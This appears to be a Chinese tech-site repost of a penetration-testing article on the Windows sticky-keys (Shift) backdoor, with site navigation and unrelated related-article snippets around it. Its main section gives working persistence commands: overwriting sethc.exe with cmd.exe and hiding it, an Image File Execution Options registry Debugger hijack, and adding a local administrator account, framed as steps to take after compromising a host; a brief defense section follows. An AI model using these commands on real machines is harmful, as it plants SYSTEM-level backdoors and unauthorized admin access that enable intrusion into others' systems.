0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

Windows Shift后门利用

jf_hKIAo4na 来源:Mi1k7ea 2023-01-30 10:38 次阅读

0x00 前言

通常,在内网渗透打下一台机子之后,可以给这台机子留个Shift后门。

0x01 Shift后门利用

简介

粘滞键漏洞,在Windows系统下连续按5下SHIFT键,可以启动系统的粘滞键功能,其进程名为Sethc.exe,应用程序在Windowssystem32下。

黑客用其它应用程序(如:cmd.exe、explorer.exe 或木马、病毒)将Sethc.exe替换。当再次连续按5次SHIFT键,就会启动黑客替换的应用程序,如此便留下了5下SHIFT后门,黑客3389登录远程计算机时,在用户登录界面,连续按5下SHIFT就可以启动该漏洞,进而控制远程计算机。

漏洞原理

在Windows系统登录界面状态下,粘滞键仍可以以连续按5下SHIFT键运行,并且此时应用程序会以WINDOWS的最高权限-SYSTEM权限运行,所以计算机一旦被安装该后门,入侵者便可悄无声息地远程操纵计算机。

漏洞利用

大致思路如下:

拿到目标主机权限后,到Windowssystem32目录下,将sethc.exe替换成cmd.exe;

其中,命令行方式为:

copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe
copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
attrib c:windowssystem32sethc.exe +h
attrib c:windowssystem32dllcachesethc.exe +h

注意:要将dllcache文件夹中的缓存删掉,否则会自动复原回去。

注册表方式为:

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"

命令说明:reg add是向注册表添加记录,后面跟的是注册表的位置,注意的是HKLM是HKEY_LOCAL_MACHINE的缩写。Image File Execution Option这个目录是用来设置镜像劫持的,要被劫持的就是命令中的sethc粘滞键程序,随后通过/ v来指定键名,其中键名debugger是固定的,然后通过/ t来指定REG_SZ字符串类型,最后通过/ d来指定键的值,即被恶意替换的程序cmd.exe。

这样,在下次远程连接目标主机登录的时候就可以连续5下SHIFT触发cmd.exe;

可以输入explorer.exe调出程序管理系统方便操作;

当然,上面的方法存在缺陷,就是可能会导致远程连接无法持久进行,因此可以直接添加新用户便于下次直接登录:

net user mi1k7ea 123456 /add
net localgroup administrators mi1k7ea /add'

防御方法

如果系统盘为NTFS文件系统,可以将sytem32下的sethc.exe文件设为everyone拒绝访问;

直接将其删除,最好的方法是在控制面板-辅助功能选项-粘滞键选项,将“使用快捷键”取消即可。;

通过注册表设置实现防御;

审核编辑 :李倩

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • WINDOWS
    +关注

    关注

    3

    文章

    3544

    浏览量

    88668
  • 应用程序
    +关注

    关注

    37

    文章

    3268

    浏览量

    57699
  • Shift
    +关注

    关注

    0

    文章

    5

    浏览量

    7468

原文标题:Windows Shift后门利用

文章出处:【微信号:菜鸟学安全,微信公众号:菜鸟学安全】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    2024 Commvault SHIFT全球巡演中国站完美收官

    近日,2024 Commvault SHIFT全球巡演 · 中国站完美收官。大会汇聚数据安全和管理领域的知名专家、业务掌舵人和生态伙伴,聚焦混合云趋势下的数据保护需求变革,探讨企业如何借助创新平台驱动全新范式,成就持续业务的竞争优势,呈现了一场思想和技术的盛宴。
    的头像 发表于 12-10 16:44 409次阅读

    Windows 10将于2025年终止免费更新,微软力推Windows 11

    近日,微软在其官方网站上发布了一则通知,宣布自2025年10月14日起,将正式停止为Windows 10操作系统提供来自Windows更新的免费软件更新、技术支持以及安全修复程序。这一决定意味着
    的头像 发表于 11-05 10:35 369次阅读

    Commvault SHIFT全球线上大会圆满落幕

    近日,Commvault SHIFT全球线上大会圆满落幕。大会上,Commvault发布了一系列面向持续业务的平台新功能,并携手行业专家畅谈云优先时代的弹性趋势。Commvault总裁兼首席执行官
    的头像 发表于 10-21 11:32 389次阅读

    华纳云:ChatGPT 登陆 Windows

    ChatGPT 现已在 Windows 上推出。 今天,OpenAI宣布已开始预览其 AI 聊天机器人平台ChatGPT的专用 Windows 应用程序。 OpenAI 表示, ChatGPT
    的头像 发表于 10-18 15:50 240次阅读

    Windows管理内存的三种主要方式

    Windows操作系统提供了多种方式来管理内存,以确保系统资源的有效利用和性能的优化。以下是关于Windows管理内存的三种主要方式的详细阐述,包括堆内存管理、虚拟内存管理以及共享内存管理,每种方式都将从概念、原理、运作机制和应
    的头像 发表于 10-12 17:09 769次阅读

    Credo发布HiWire SHIFT AEC新品

    该新系列SHIFT AEC产品是基于Credo先进的800G HiWire AEC设计优化而来,能效卓越,性能更佳,且具有极致的可靠性
    的头像 发表于 09-12 14:07 317次阅读

    windows11 远程连接工具

    随着远程办公的普及,选择合适的远程桌面工具变得尤为重要。在Windows11上,用户可以利用系统自带的远程桌面功能,或选择更专业的第三方解决方案,如Splashtop。本文将详细介绍如何在
    的头像 发表于 08-06 08:37 358次阅读
    <b class='flag-5'>windows</b>11 远程连接工具

    针对Windows系统和macOS系统的全局代理修改方法

    WINDOWS
    jf_62215197
    发布于 :2024年07月16日 07:30:54

    后门!ASML可远程锁光刻机!

    与ASML进行光刻机问题沟通时,负责人做出了保证,他们有能力远程锁控芯片制造设备。 这就意味着ASML传承了欧美企业留有“后门”的习惯,而伴随着这样一则信息的揭露,或许很有可能会被美国所利用,彻底走向不可控的局面,而ASML丝毫不加以掩饰,这其中很可能存
    的头像 发表于 05-24 09:35 569次阅读

    微软确认Windows 10和Windows Server 2019更新5月版时出现0x错误

    近期,微软更新Windows健康控制台,公开承认其针对Windows 10系统于5月份推出的更新(即KB5037765)与Windows Server 2019面临同样的问题——安装过程中可能出现0x800f0982错误。
    的头像 发表于 05-17 11:10 597次阅读

    Windows 11 22H2新版任务管理器新增启用隐藏功能

    关于如何隐藏调用旧版任务管理器,网友 @thebookisclosed 分享了详细步骤。他指出,在现有 Windows 11 环境中,即使按 Ctrl+Shift+Esc 组合键也难以调出老版本的任务管理器,需通过特定路径“C:\Win
    的头像 发表于 03-27 15:08 490次阅读

    趋势科技报告揭示黑客利用Windows Defender SmartScreen漏洞进行恶意软件分发

    这起事故被编号为CVE-2024-21412,出现在Windows Defender SmartScreen之中的一项漏洞,攻击者透过生成特定文件,轻易绕开微软系统的严密安全审查。
    的头像 发表于 03-14 09:48 454次阅读

    WINDOWS系统有几个版本

    Windows系统自1985年发布以来,已经推出了多个版本。根据不同的分类方式,Windows系统的版本可以分为以下几类: 按照时间顺序。包括Windows 1.0、Windows 2
    发表于 02-29 16:40

    Commvault SHIFT大会·中国站圆满落幕

    1月18日,Commvault SHIFT 大会 · 中国站圆满落幕!本次大会以“驱动网络弹性新转变”为主题,Commvault携手行业专家,通过主题演讲、客座分享、观点碰撞等形式,为参会者带来网络弹性前沿趋势、创新方法和最佳实践的精彩分享!
    的头像 发表于 01-23 14:46 947次阅读

    传音Infinix在CES 2024上推出最新突破性技术E-Color Shift

    近日,传音旗下品牌Infinix在CES 2024上推出最新突破性技术E-Color Shift,可以使手机背面面板在不消耗电力的情况下改变并保持鲜艳的颜色。
    的头像 发表于 01-23 11:39 1152次阅读